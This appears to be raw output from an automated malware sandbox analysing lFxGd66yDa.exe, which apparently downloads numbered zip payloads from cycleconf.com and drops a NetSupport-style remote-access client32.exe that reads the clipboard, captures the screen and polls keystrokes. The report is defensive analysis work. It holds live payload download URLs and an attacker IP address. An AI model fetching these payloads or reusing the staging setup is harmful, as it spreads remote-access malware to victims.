Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: http://www.crossteccorp.com
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr	String found in binary or memory: http://www.globalsign.net/repository09
Source: client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/$6N
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/4
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/J
Source: lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192545853.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zip
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zipU
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_1.zipt
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192545853.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zip
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zip(
Source: lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zipX
Source: lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zipr
Source: lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_2.zipz
Source: lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217623422.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_3.zip
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_3.zip=
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_3.zipcache
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217417326.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217331430.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217525712.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217623422.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_3.zipnd2_2.zip
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_4.zip
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_4.zipW
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_4.zipcache
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cycleconf.com/dwnld/2nd2_4.zipr
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: lFxGd66yDa.exe, 00000000.00000003.2193020778.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192984035.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.0.dr, TCCTL32.DLL.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: TCCTL32.DLL.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 23.254.224.41:443 -> 192.168.2.6:49707 version: TLS 1.2

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

4_2_1101F350

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	4_2_1101F350
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11032870 GetClipboardFormatNameA,SetClipboardData,	4_2_11032870
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101F350
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11032870 GetClipboardFormatNameA,SetClipboardData,	6_2_11032870

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

4_2_11031B70

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,

4_2_110076F0

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		4_2_11110930
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11110930

Source: Yara match	File source: 6.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 1548, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		4_2_11112960
